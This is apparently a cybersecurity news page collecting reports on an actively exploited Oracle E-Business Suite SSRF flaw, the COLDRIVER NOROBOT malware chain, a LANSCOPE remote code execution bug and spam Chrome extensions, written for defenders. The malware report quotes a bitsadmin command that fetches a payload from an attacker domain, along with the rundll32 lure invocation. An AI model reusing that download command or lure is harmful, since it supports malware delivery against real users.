A sophisticated cyberespionage campaign dubbed PassiveNeuron has emerged from the shadows after months of dormancy, with security researchers uncovering fresh details about its operations and attack methods. The campaign, first detected in June 2024, has resurfaced with renewed vigor, targeting government, financial and industrial organizations across Asia, Africa and Latin America with previously unknown malware […]
Wilmington, Delaware, October 21st, 2025, CyberNewsWire Sendmarc has announced the appointment of Dan Levinson as Customer Success Director – North America, furthering the company’s regional expansion and commitment to providing expert, locally aligned support to organizations across the continent. Levinson will lead the development of customer success programs that help businesses strengthen their email security […]
CISA has issued an urgent alert about a critical server-side request forgery (SSRF) vulnerability in Oracle E-Business Suite, now actively exploited by threat actors.
Tracked as CVE-2025-61884, the flaw affects the Runtime component of Oracle Configurator and allows remote attackers to forge requests without authentication, potentially leading to unauthorized access and data exfiltration.
This vulnerability, rated with a high severity score under CVSS 3.1, stems from inadequate input validation that enables attackers to manipulate server requests to internal or external resources.
As organizations rely heavily on Oracle E-Business Suite for enterprise resource planning (ERP), the risks are amplified in sectors like finance, manufacturing, and government, where sensitive data flows through these systems.
Exploitation Tactics And Real-World Impact
CISA’s Known Exploited Vulnerabilities (KEV) catalog added CVE-2025-61884 after evidence emerged of active exploitation in the wild.
Attackers can leverage SSRF to scan internal networks, bypass firewalls, and interact with cloud metadata services, often as a stepping stone for broader intrusions.
While direct ties to ransomware campaigns remain unconfirmed, security researchers note similarities to tactics used in recent supply chain attacks, where SSRF flaws have facilitated lateral movement.
Oracle patched the issue in its October 2025 Critical Patch Update, but unpatched systems remain prime targets.
Early reports indicate exploitation attempts targeting outdated E-Business Suite installations in the Asia-Pacific regions, with potential for widespread compromise if organizations delay remediation.
The flaw aligns with CWE-918, a common SSRF weakness that has plagued enterprise software for years.
Mitigations
CISA urges immediate action: apply Oracle’s vendor-provided patches or mitigations, such as network segmentation and web application firewalls (WAFs) tuned to block anomalous requests.
For cloud-hosted instances, adhere to Binding Operational Directive (BOD) 22-01, which mandates vulnerability management in federal systems.
If mitigations prove infeasible, CISA advises discontinuing use of affected products to avoid exposure. Experts emphasize proactive monitoring, including logging SSRF indicators like unexpected outbound traffic.
Organizations should scan their networks for vulnerabilities using tools like Nessus or OpenVAS and review access logs for signs of exploitation.
Luma Infostealer, a malware-as-a-service (MaaS) offering, has emerged as a potent threat targeting high-value credentials such as web browser cookies, cryptocurrency wallets, and VPN/RDP account information. Beyond isolated theft, threat actors are employing Luma in the initial infiltration stages of complex campaigns—ransomware deployment, account hijacking, and internal network compromise. The stolen data fuels identity theft, […]
Understanding exactly how users authenticate to cloud services is crucial for effective security monitoring. A recently refined bitfield mapping technique decodes the opaque UserAuthenticationMethod values in Microsoft 365 audit logs, transforming numeric codes into actionable, human-readable descriptions. This breakthrough empowers incident responders to identify primary authentication methods even when only Microsoft 365 audit logs are […]
Apache Syncope, has disclosed a critical security vulnerability that allows authenticated administrators to execute arbitrary code on affected systems. The flaw, tracked as CVE-2025-57738, impacts all Apache Syncope versions 3.x before 3.0.14 and 4.x before 4.0.2, exposing organisations to potential system compromise through malicious Groovy code injection. Vulnerability Details and Attack Mechanism The vulnerability exists […]
Over the summer of 2025, a novel malware family emerged following the public disclosure of the LOSTKEYS implant.
This new strain was rapidly weaponized in a series of highly targeted campaigns against policy advisors, non-governmental organizations, and dissidents.
Leveraging a refreshed lure known as COLDCOPY ClickFix, threat actors masqueraded the payload as a CAPTCHA verification to dupe users into executing a malicious DLL via rundll32.
Early samples demonstrated an aggressive development tempo marked by multiple iterations of the downloader component and backdoor stages.
Google Cloud analysts noted that the loader, dubbed NOROBOT, began deployment within days after LOSTKEYS was profiled.
Unlike its predecessor— which relied on a multi-stage PowerShell approach—NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the infection chain.
Subsequent stages fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining components to decrypt and install a Python backdoor, YESROBOT.
Initial operations saw YESROBOT deployed briefly in late May before being quickly replaced by a streamlined PowerShell backdoor, MAYBEROBOT.
This change addressed the detection noise created by a bundled Python interpreter and enabled more flexible command execution without requiring a full interpreter runtime.
Both backdoors maintained minimal built-in functions, relying on the operator to supply complex commands over HTTPS to a hardcoded command-and-control server.
Within months, the malware reached its third major iteration, exhibiting not only simplified delivery but also rotating infrastructure and file naming conventions to evade network defenders.
Malware development overview illustrates this evolution, from the initial complex downloader to the condensed logon script mechanism.
Malware development overview (Source – Google Cloud)
COLDCOPY attempting to lure the user to execute NOROBOT highlights the social engineering employed to trick targets into executing a seemingly innocuous DLL.
Infection Mechanism
The infection begins when a user visits a compromised page posing as a custom CAPTCHA. The page prompts execution of iamnotarobot.dll, invoking the humanCheck export.
Once loaded, NOROBOT retrieves encrypted payload fragments via bitsadmin:-
bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py
Next, the loader writes part of the AES key to the registry and schedules a task to assemble and decrypt the final payload.
This staged approach forces defenders to collect multiple artifacts—downloads, registry entries, scheduled tasks—to reconstruct the complete chain.
By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational security while exacting intelligence collection from high-value targets.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Motex has disclosed a severe remote code execution vulnerability in its LANSCOPE Endpoint Manager On-Premise Edition. Assigned CVE-2025-61932, the flaw carries a CVSS 3.0 score of 9.8, classifying it as an emergency-level threat.
This vulnerability could allow attackers to execute arbitrary code on affected systems, potentially leading to full compromise of endpoint devices.
The issue resides in the product’s Client Program (MR) and Detection Agent (DA), components responsible for managing and monitoring endpoint security.
According to Motex’s announcement, versions up to 9.4.7.1 are vulnerable. Importantly, the cloud-based edition remains unaffected, sparing users of the SaaS version from immediate risk.
However, the on-premise deployment, popular among organizations seeking greater control over their IT environments, now faces urgent scrutiny.
LANSCOPE Endpoint Manager Vulnerability
What elevates the alarm is evidence of active exploitation. Motex reports confirmed instances where customers’ environments received malicious packets from external sources.
Attackers appear to target the client-side programs remotely, exploiting weaknesses that bypass typical network defenses.
Security researchers speculate that this could stem from improper input validation in the detection and management protocols, though full technical details await independent analysis.
This vulnerability underscores broader risks in endpoint management tools, which often run with elevated privileges. Once exploited, adversaries could deploy malware, steal sensitive data, or pivot deeper into corporate networks.
Given the high CVSS score driven by its network accessibility, low complexity, and lack of privileges or user interaction required organizations using affected versions should prioritize remediation.
Motex has promptly released a fix, accessible via their customer support portal, LANSCOPE PORTAL. The update targets client PCs exclusively; the central manager does not require upgrading.
Deployment follows standard procedures, making it straightforward for IT teams to roll out across endpoints. As of August 2025, when the advisory was issued, no widespread breaches have been publicly linked to this CVE, but the confirmed malicious activity signals potential for rapid escalation.
Cybersecurity experts urge immediate patching to mitigate risks, especially in hybrid work setups where endpoints connect remotely.
A recent surge in underground cybercrime chatter has shone a spotlight on Monolock Ransomware V1.0, as multiple posts on dark web forums claim that the malicious software is now available for purchase. Cybersecurity researchers monitoring illicit marketplaces report that threat actors are advertising a fully functional ransomware strain, complete with encryption modules, key exchange mechanisms, […]
Over the past several months, cybersecurity researchers have observed a surge of fraudulent Chrome extensions masquerading as legitimate WhatsApp Web automation tools.
These 131 rebranded clones, each presenting as distinct offerings, share an identical codebase designed to automate bulk messaging and scheduling without user consent.
By injecting custom scripts directly into the WhatsApp Web interface, the extensions bypass native rate limits and anti-spam measures.
Each listing advertises features such as message templates, scheduling controls, and analytics dashboards that appeal to small businesses, particularly in Brazil, where WhatsApp is critical for customer outreach.
The extensions exploit Chrome’s Manifest V3 service worker capabilities to run background tasks, scheduling bulk sends without explicit user interaction.
Chrome Web Store listings (Source – Socket.dev)
Socket.dev analysts noted that the core module leverages a code snippet like:
This injection attaches to the page’s DOM and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming campaigns.
Socket.dev researchers identified that the service worker fetches a remote configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.
Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained live as of mid-October 2025.
Each clone is marketed under glossy landing pages with assurances of privacy compliance and rigorous code audits—claims that contradict platform guidelines.
The extensions are distributed via a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans while the original operator retains control over the backend.
Evasion and Persistence Tactics
The most sophisticated aspect of this campaign lies in its detection evasion strategy. By tuning send intervals, randomizing message content, and rotating publisher accounts, the operators maintain continuous operations despite takedown requests.
A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:-
This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server.
Coupled with varied naming conventions and thousands of active users across listings, the campaign exemplifies policy abuse at scale and underscores the need for enhanced extension governance and user vigilance.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
.webp)
.webp)